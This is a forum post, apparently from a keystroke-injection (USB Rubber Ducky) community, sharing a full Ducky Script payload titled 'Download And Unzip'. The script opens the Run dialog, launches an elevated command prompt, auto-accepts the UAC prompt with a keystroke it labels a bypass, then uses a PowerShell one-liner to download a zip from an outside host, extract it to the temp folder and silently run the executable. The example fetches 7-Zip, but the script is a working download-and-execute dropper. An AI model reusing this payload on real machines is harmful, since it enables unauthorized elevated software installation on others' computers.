overwraith Posted November 23, 2013 Posted November 23, 2013 (edited) Here is a sub payload I learned how to do while writing that "flash drive slurp" payload. It is a little different than the implementation in the flash drive slurp payload. REM Author: overwraith REM Name: Download And Unzip.txt REM Purpose: Downloads, unzips and installs a program. REM Encoder V2.4+ REM *** Initial Delay *** DELAY 2000 REM *** Bypass UAC *** REM Using the run command for a broader OS base. GUI r DELAY 250 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER REM *** The destination to unzip to. **** STRING set dest=%TEMP% ENTER REM *** Navigate to destination. *** STRING cd %dest% ENTER REM *** Delete files unzipped if might run multiple times. *** STRING erase /Q 7za.exe 7z920.zip 7-zip.chm license.txt readme.txt ENTER REM *** Install the program, in this case 7zip. *** STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%dest%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%dest%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%dest%').copyhere($item) }Start-Process '%dest%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\' ENTER REM *** Delay 7 Seconds. *** DELAY 7000 REM *** Switch from powershell back to command line. *** STRING CMD ENTER Edited November 23, 2013 by overwraith Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.